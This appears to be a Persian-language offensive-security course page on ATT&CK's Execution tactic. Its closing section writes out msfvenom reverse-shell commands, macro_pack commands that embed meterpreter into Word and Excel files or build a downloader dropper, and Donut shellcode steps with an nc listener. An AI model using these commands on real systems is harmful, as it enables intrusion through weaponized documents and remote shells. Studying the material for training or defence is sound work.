به جلسه چهارم از دوره آموزشی مایتراتک خوش آمدید
جهت دسترسی به ویدیو به لینک زیر مراجعه فرمایید:
Malware,spyware
RAT,C2
بدافزار که یکی از زیر مجموعه هاش جاسوس افزار که بازیگران تهدید جهت کنترل جاسوسی و … از آن استفاده می کنند.
Vulnerability
نقص در یک سیستم که هکرها از آن سواستفاده می کنند و می توانند بدون احراز هویت و تعیین سطح دسترسی بخوانند بنویسند اجرا کنند یا تغییرات بدهند.
Exploit
به سواستفاده از آسیب پذیری می گوییم اکسپلویت مثلا وجود آسیب پذیری RCE روی یک سیستم عامل این امکان را می دهد که هکر بتوانند کد مخرب خود را به صورت ریموت روی سیستم قربانی اجرا کند.
Payload
کد مخربی است که بعد از اکسپلویت شدن روی سیستم آسیب پذیری اجرا می شود برای استفاده هکر از سیستم مثلا پیلود reverse_tcp متااسپلویت وقتی سیستم قربانی اکسپلویت بشود با توجه به socket که قبلا هکر بایند کرده به هکر یک دسترسی کامند لاین SHELLCODE می دهد
Bindshell
یک برنامه که سوکتی باز می کند و گوش می دهد به محض دریافت اطلاعات امکان برقرای ارتباط در قالب کامند را میسر می کند.
ما تا الان یاد گرفتیم پیلود بسازیم با c2 های مختلف که هر کدام listenerهای مختلف یا همان bindshell ها را ساپورت می کنند در بستر http https smb و… حالا که ما رسیدیم به فایل مخرب باید ببینیم هکرها از چه روشی برای اجرای این فایل های مخرب استفاده می کنند.
https://github.com/klezVirus/CVE-2021-40444
تاکتیک اجرا کردن بدافزار:
وقتی بدافزار ساخته می شود تا زمانی که قربانی آن را اجرا نکند هیچ دسترسی اولیه ایجاد نخواهد شد لذا بازیگران تهدید باید ازتکنیک های مختلف جهت اجرا شدن بدافزار استفاده کنند حال این تکنیک های قابلیت های خود سیستم عامل مثل مفسرهای اسکریپت گاه API سیستم عامل برای ساخت یک پراسس یا فراخوانی یک کتاب خانه در حافظه می باشد و گاه سواستفاده از آسیب پذیری برای اجرا شدن خودکار بدافزار می باشد.
ATT&CK – Execution (TA0002)
The adversary is trying to run malicious code.
Execution consists of techniques that result in adversary-controlled code running on a local or remote system. Techniques that run malicious code are often paired with techniques from all other tactics to achieve broader goals, like exploring a network or stealing data. For example, an adversary might use a remote access tool to run a PowerShell script that does Remote System Discovery.
یکی از متداول ترین روش اجرای پیلودها استفاده از کامندها و اسکریپتینگ می باشد که در تمامی سیستم عامل های کلاینت و سروری وجود دارد.
Cmd, Powershell, AppleScript, Unix Shell, Visual Basic, Python, Java Script, Network Device CLI
Command and Scripting Interpreter T1059 [Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell.]
PowerShell [Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).]
AppleScript [Adversaries may abuse AppleScript for execution. AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents. These AppleEvent messages can be sent independently or easily scripted with AppleScript. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely.]
Windows Command Shell [Adversaries may abuse the Windows command shell for execution. The Windows command shell (cmd) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands. The command prompt can be invoked remotely via Remote Services such as SSH.]
Unix Shell [Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the primary command prompt on Linux and macOS systems, though many variations of the Unix shell exist (e.g. sh, bash, zsh, etc.) depending on the specific OS or distribution. Unix shells can control every aspect of a system, with certain commands requiring elevated privileges.]
Visual Basic [Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as Component Object Model and the Native API through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core.]
Python [Adversaries may abuse Python commands and scripts for execution. Python is a very popular scripting/programming language, with capabilities to perform many functions. Python can be executed interactively from the command-line (via the python.exe interpreter) or via scripts (.py) that can be written and distributed to different systems. Python code can also be compiled into binary executables.]
JavaScript [Adversaries may abuse various implementations of JavaScript for execution. JavaScript (JS) is a platform-independent scripting language (compiled just-in-time at runtime) commonly associated with scripts in webpages, though JS can be executed in runtime environments outside the browser.]
Network Device CLI [Adversaries may abuse scripting or built-in command line interpreters (CLI) on network devices to execute malicious command and payloads. The CLI is the primary means through which users and administrators interact with the device in order to view system information, modify device operations, or perform diagnostic and administrative functions. CLIs typically contain various permission levels required for different commands.]
بازیگران تهدید از کانینرها برای اجرای دستوراتی که شامل ران کردن پیلودهای مخرب می باشد استفاده می کنند.
Container Administration Command T1609 [Adversaries may abuse a container administration service to execute commands within a container. A container administration service such as the Docker daemon, the Kubernetes API server, or the kubelet may allow remote management of containers within an environment.]
Deploy Container T1610 [Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment.]
بازیگران تهدید در صورت امکان استفاده از اکسپلویت برای اجرا شدن بدافزار روی سیستم قربانی استفاده می کنند اکسپلویت ها
0day => one click, Zero Click
Exploitation for Client Execution T1203 [Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.]
استفاده از IPC برای اجرای پیلود در قالب فایل های اجرایی یا کتاب خانه ها
Exe, DLL, COM,DDE, OLE, XPC
Inter-Process Communication T1559 [Adversaries may abuse inter-process communication (IPC) mechanisms for local code or command execution. IPC is typically used by processes to share data, communicate with each other, or synchronize execution. IPC is also commonly used to avoid situations such as deadlocks, which occurs when processes are stuck in a cyclic waiting pattern.]
Component Object Model [Adversaries may use the Windows Component Object Model (COM) for local code execution. COM is an inter-process communication (IPC) component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces. Through COM, a client object can call methods of server objects, which are typically binary Dynamic Link Libraries (DLL) or executables (EXE). Remote COM execution is facilitated by Remote Services such as Distributed Component Object Model (DCOM).]
Dynamic Data Exchange [Adversaries may use Windows Dynamic Data Exchange (DDE) to execute arbitrary commands. DDE is a client-server protocol for one-time and/or continuous inter-process communication (IPC) between applications. Once a link is established, applications can autonomously exchange transactions consisting of strings, warm data links (notifications when a data item changes), hot data links (duplications of changes to a data item), and requests for command execution.]
XPC Services [Adversaries can provide malicious content to an XPC service daemon for local code execution. macOS uses XPC services for basic inter-process communication between various processes, such as between the XPC Service daemon and third-party application privileged helper tools. Applications can send messages to the XPC Service daemon, which runs as root, using the low-level XPC Service C API or the high level NSXPCConnection API in order to handle tasks that require elevated privileges (such as network connections). Applications are responsible for providing the protocol definition which serves as a blueprint of the XPC services. Developers typically use XPC Services to provide applications stability and privilege separation between the application client and the daemon.]
Native API [Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes. These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.]
استفاده از قابلیت Schedule در سیستم عامل ویندوز و لینوکس
Task schedule, AT, CRON, system, container
Scheduled Task/Job T1053 [Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.]
At [Adversaries may abuse the at utility to perform task scheduling for initial or recurring execution of malicious code. The at utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of Scheduled Task’s schtasks in Windows environments, using at requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.]
Cron [Adversaries may abuse the cron utility to perform task scheduling for initial or recurring execution of malicious code. The cron utility is a time-based job scheduler for Unix-like operating systems. The crontab file contains the schedule of cron entries to be run and the specified times for execution. Any crontab files are stored in operating system-specific file paths.]
Scheduled Task [Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code. There are multiple ways to access the Task Scheduler in Windows. The schtasks utility can be run directly on the command line, or the Task Scheduler can be opened through the GUI within the Administrator Tools section of the Control Panel. In some cases, adversaries have used a .NET wrapper for the Windows Task Scheduler, and alternatively, adversaries have used the Windows netapi32 library to create a scheduled task.]
Systemd Timers [Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension .timer that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to Cron in Linux environments. Systemd timers may be activated remotely via the systemctl command line utility, which operates over SSH.]
Container Orchestration Job [Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.]
Serverless Execution T1648 [Adversaries may abuse serverless computing, integration, and automation services to execute arbitrary code in cloud environments. Many cloud providers offer a variety of serverless resources, including compute engines, application integration services, and web servers.]
Shared Modules T1129 [Adversaries may execute malicious payloads via loading shared modules. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like CreateProcess, LoadLibrary, etc. of the Win32 API.]
Software Deployment Tools T1072 [Adversaries may gain access to and use third-party software suites installed within an enterprise network, such as administration, monitoring, and deployment systems, to move laterally through the network. Third-party applications and software deployment systems may be in use in the network environment for administration purposes (e.g., SCCM, HBSS, Altiris, etc.).]
System Services T1569 [Adversaries may abuse system services or daemons to execute commands or programs. Adversaries can execute malicious content by interacting with or creating services either locally or remotely. Many services are set to run at boot, which can aid in achieving persistence (Create or Modify System Process), but adversaries can also abuse services for one-time or temporary execution.]
Launchctl [Adversaries may abuse launchctl to execute commands or programs. Launchctl interfaces with launchd, the service management framework for macOS. Launchctl supports taking subcommands on the command-line, interactively, or even redirected from standard input.]
Service Execution [Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager (services.exe) is an interface to manage and manipulate services. The service control manager is accessible to users via GUI components as well as system utilities such as sc.exe and Net.]
User Execution T1204 [An adversary may rely upon specific actions by a user in order to gain execution. Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link. These user actions will typically be observed as follow-on behavior from forms of Phishing.]
Malicious Link [An adversary may rely upon a user clicking a malicious link in order to gain execution. Users may be subjected to social engineering to get them to click on a link that will lead to code execution. This user action will typically be observed as follow-on behavior from Spearphishing Link. Clicking on a link may also lead to other execution techniques such as exploitation of a browser or application vulnerability via Exploitation for Client Execution. Links may also lead users to download files that require execution via Malicious File.]
Malicious File [An adversary may rely upon a user opening a malicious file in order to gain execution. Users may be subjected to social engineering to get them to open a file that will lead to code execution. This user action will typically be observed as follow-on behavior from Spearphishing Attachment. Adversaries may use several types of files that require a user to execute them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and .cpl.]
Malicious Image [Adversaries may rely on a user running a malicious image to facilitate execution. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be backdoored. Backdoored images may be uploaded to a public repository via Upload Malware, and users may then download and deploy an instance or container from the image without realizing the image is malicious, thus bypassing techniques that specifically achieve Initial Access. This can lead to the execution of malicious code, such as code that executes cryptocurrency mining, in the instance or container.]
Windows Management Instrumentation [Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM). Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.]
منبع:
https://attack.mitre.org/tactics/TA0002/
لیست ابزارها:
https://github.com/klezVirus/CVE-2021-40444
https://github.com/mgeeky/PackMyPayload
برای اینکه شل کد ران کنیم از سورس کد سی شارپ زیر استفاده شد
https://github.com/HackingThings/SneakyExec
یک نمونه کد دیگه برای ران کردن شل کرد جهت شبیه سازی native api
https://gist.github.com/matterpreter/03e2bd3cf8b26d57044f3b494e73bbea
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
macro_pack
https://github.com/sevagas/macro_pack
echo “calc.exe” | macro_pack.exe -t CMD -o -G “calc.xls”
E:\metasploit-framework\bin\msfvenom.bat -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.148 -f vba | macro_pack.exe -o -G “report.doc”
echo “http://192.168.1.1:8080/a.exe” “b.exe” | macro_pack.exe -t DROPPER -o -G “im.xls”
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Donut
https://github.com/TheWover/donut
cp DonutTest/Program.cs ../Payloads/Test.cs
cp ProcessManager/Program.cs ../Payloads/ProcMgr.cs
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:ProcMgr.exe /nologo .\ProcMgr.cs
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.219.128 LPORT=4444 -f exe -o payload.exe
cp payload.exe ../Payloads/
./donut -a 2 -b 3 -f 2 ../Payloads/payload.exe
cp loader.b64 ../Payloads/venom.b64
nc -lvp 4444
ProcMgr.exe –name explorer
base64 on Test.cs save as mete.cs
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:mete.exe /nologo .\mete.cs
DLL
msfvenom -p windows/shell_reverse_tcp lhost=192.168.219.128 lport=443 -f dll > shell.dll
./donut -a 2 -b 3 -f 2 ../Payloads/artifact.dll
